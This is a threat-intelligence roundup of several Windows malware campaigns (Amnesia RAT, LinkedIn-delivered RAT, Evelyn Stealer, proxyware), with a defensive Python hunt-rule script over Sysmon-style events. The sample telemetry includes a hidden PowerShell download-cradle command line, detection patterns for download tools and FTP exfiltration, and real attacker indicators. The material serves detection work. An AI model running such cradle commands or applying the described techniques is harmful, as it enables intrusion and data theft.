Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed Windows-focused malware delivery chains that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a multi-stage campaign targeting users in Russia that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying Amnesia RAT and, ultimately, ransomware with widespread file encryption. A notable technique in that intrusion is the abuse of Defendnot, a research tool that registers a dummy antivirus product with Windows Security Center so that Microsoft Defender disables itself; payloads are hosted modularly across public cloud services (e.g., GitHub for scripts and Dropbox for binaries) to improve resilience and complicate takedowns.
Separately, ReliaQuest reported attackers using LinkedIn private messages to build trust with targets and deliver a WinRAR self-extracting archive (SFX) that triggers DLL sideloading through a legitimate PDF reader, then establishes persistence via a Registry Run key and executes Base64-encoded shellcode in memory to load a RAT-like payload. Trend Micro and Koi Security documented Evelyn Stealer, which uses malicious VS Code extensions to drop a downloader DLL (e.g., Lightshot.dll), run hidden PowerShell to fetch runtime.exe, and inject the stealer into grpconv.exe; the stealer exfiltrates credentials, cookies, cryptocurrency wallets, screenshots and Wi-Fi credentials to server09.mentality[.]cloud over FTP. AhnLab ASEC also reported proxyjacking activity in South Korea attributed to Larva-25012: proxyware disguised as a Notepad++ installer, with evasion that has evolved over time (e.g., injecting into Windows Explorer and using Python-based loaders), monetizing victims' bandwidth through unauthorized proxyware installation.
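Several of the behaviours above are visible in ordinary endpoint telemetry: an unsigned DLL loaded from the same user-writable folder as a signed PDF reader, a Run key whose value points into a user profile, PowerShell started hidden with a download cradle, a remote thread created in grpconv.exe, and outbound FTP from a process that is not an FTP client. The Python below is an added example for this page, not code from any of the cited vendors; it runs simple hunt rules over Sysmon-style events. The event dictionary layout is an assumed, simplified export, and the sample events are constructed. Apart from the names the page reports (runtime.exe, grpconv.exe, server09.mentality[.]cloud), every path, DLL name and parent process in the sample is illustrative.

```python
"""Hunt rules for the delivery-chain behaviours described on this page,
run over Sysmon-style telemetry: ProcessCreate (1), NetworkConnect (3),
ImageLoad (7), CreateRemoteThread (8) and RegistryEvent (13).

Added example; not code from FortiGuard, ReliaQuest, Trend Micro, Koi
Security or AhnLab. The dict keys are an assumed, simplified Sysmon export
and the SAMPLE events at the bottom are constructed for illustration."""
import re
from pathlib import PureWindowsPath

# Directories where an unsigned DLL beside a signed EXE is worth a look.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I)
# Signed Windows binaries that rarely run on their own and make convenient injection hosts.
INJECT_HOSTS = {"grpconv.exe"}
FTP_CLIENTS = {"ftp.exe", "filezilla.exe", "winscp.exe"}


def _in_user_writable(path):
    return any(seg in path.lower() for seg in USER_WRITABLE)


def _parent_dir(path):
    return str(PureWindowsPath(path).parent).lower()


def _basename(path):
    return PureWindowsPath(path).name.lower()


def detect_sideload(events):
    """ImageLoad: signed EXE loads an unsigned DLL from its own user-writable folder."""
    return [("dll_sideload", e["image"], e["dll"])
            for e in events
            if e["id"] == 7 and e.get("proc_signed") and not e.get("dll_signed")
            and _in_user_writable(e["dll"]) and _parent_dir(e["dll"]) == _parent_dir(e["image"])]


def detect_run_key(events):
    """RegistryEvent: Run value whose command lives under a user-writable path."""
    return [("run_key_persistence", e["target"], e["details"])
            for e in events
            if e["id"] == 13 and RUN_KEY.search(e["target"]) and _in_user_writable(e["details"])]


def detect_hidden_cradle(events):
    """ProcessCreate: PowerShell launched with a hidden window and a download cradle."""
    return [("hidden_powershell_download", e["parent_image"], e["cmdline"])
            for e in events
            if e["id"] == 1 and _basename(e["image"]) == "powershell.exe"
            and HIDDEN.search(e["cmdline"]) and CRADLE.search(e["cmdline"])]


def detect_injection(events):
    """CreateRemoteThread: user-writable source injecting into a rarely used signed host."""
    return [("remote_thread_into_lolbin", e["source_image"], e["target_image"])
            for e in events
            if e["id"] == 8 and _basename(e["target_image"]) in INJECT_HOSTS
            and _in_user_writable(e["source_image"])]


def detect_ftp_exfil(events):
    """NetworkConnect: outbound tcp/21 from anything that is not a known FTP client."""
    return [("ftp_exfil", e["image"], e["dest_host"])
            for e in events
            if e["id"] == 3 and e["dest_port"] == 21 and _basename(e["image"]) not in FTP_CLIENTS]


def hunt(events):
    """Run every rule and return the combined list of (rule, subject, detail) findings."""
    findings = []
    for rule in (detect_sideload, detect_run_key, detect_hidden_cradle, detect_injection, detect_ftp_exfil):
        findings.extend(rule(events))
    return findings


# Constructed sample telemetry approximating the LinkedIn SFX chain and the
# Evelyn Stealer chain. Paths, the sideloaded DLL name and the parent of
# PowerShell are illustrative; the benign notepad/kernel32 and FileZilla
# events are there to show the rules do not fire on ordinary activity.
SAMPLE = [
    {"id": 7, "image": r"C:\Users\u\AppData\Local\Temp\RarSFX0\reader.exe", "proc_signed": True,
     "dll": r"C:\Users\u\AppData\Local\Temp\RarSFX0\version.dll", "dll_signed": False},
    {"id": 7, "image": r"C:\Windows\System32\notepad.exe", "proc_signed": True,
     "dll": r"C:\Windows\System32\kernel32.dll", "dll_signed": True},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\u\AppData\Roaming\python\pythonw.exe C:\Users\u\AppData\Roaming\u.py"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/runtime.exe',$env:TEMP+'\\runtime.exe')\""},
    {"id": 8, "source_image": r"C:\Users\u\AppData\Local\Temp\runtime.exe",
     "target_image": r"C:\Windows\System32\grpconv.exe"},
    {"id": 3, "image": r"C:\Windows\System32\grpconv.exe",
     "dest_host": "server09.mentality[.]cloud", "dest_port": 21},
    {"id": 3, "image": r"C:\Program Files\FileZilla\filezilla.exe",
     "dest_host": "ftp.example.invalid", "dest_port": 21},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE):
        print(*finding)
```

Each rule is deliberately narrow so it stays cheap to run over a full day of telemetry; in practice the sideload rule is the noisiest (installers and portable apps legitimately ship unsigned DLLs next to a signed EXE), so it is usually gated on the EXE being one the fleet does not normally run from Temp or a RarSFX folder.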

How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
Trend Micro details Evelyn Stealer's credential and crypto theft capabilities
Trend Micro disclosed that the Evelyn Stealer campaign targets software developers to steal developer credentials and cryptocurrency-related data, with compromised developer machines potentially serving as entry points into wider organizations. The researchers said the malware injects itself into a legitimate Windows process in memory, uses anti-analysis techniques, and exfiltrates collected data to a remote server over FTP as a ZIP archive.
FortiGuard Labs discloses multi-stage Windows malware campaign targeting Russia
FortiGuard Labs revealed a high-severity campaign primarily targeting Windows users in Russia through social-engineering lures in compressed archives containing decoy business documents and a malicious LNK. The infection chain fetched GitHub-hosted scripts, used obfuscated VBScript for in-memory staging and UAC abuse, disabled Microsoft Defender (including via Defendnot), exfiltrated data and screenshots over Telegram, and deployed Amnesia RAT, Hakuna Matata-derived ransomware, and a WinLocker.
ReliaQuest uncovers LinkedIn DM phishing campaign using DLL sideloading
ReliaQuest reported a phishing campaign in which attackers used LinkedIn private messages to lure targets into downloading a malicious WinRAR self-extracting archive. The payload chain abused DLL sideloading through a legitimate PDF reader, dropped a portable Python interpreter, established Run-key persistence, and attempted to connect to an external server for RAT-style access and data exfiltration.
Koi Security identifies malicious VS Code extensions delivering Evelyn Stealer
Koi Security previously documented three malicious Microsoft Visual Studio Code extensions that installed a downloader DLL, used PowerShell to fetch a second-stage payload, and ultimately delivered the Evelyn Stealer malware to target software developers.
ASEC reports ongoing Larva-25012 proxyjacking campaign in South Korea
AhnLab ASEC reported an ongoing campaign by threat actor Larva-25012 that disguises malware as a Notepad++ installer to covertly install proxyware such as Infatica and DigitalPulse on South Korean systems. The campaign used malvertising on illegal or cracked software portals, GitHub-hosted payloads, and evolving loaders including NodeJS- and Python-based DPLoader variants with persistence and defense-evasion features.
Sources
5 references tracked.
Inside a Multi-Stage Windows Malware Campaign (feeds.fortinet.com)
Inside a Multi-Stage Windows Malware Campaign | FortiGuard Labs (fortinet.com)
Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading (thehackernews.com)
Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto (thehackernews.com)
Proxyware Disguised as Notepad++ Tool - ASEC (asec.ahnlab.com)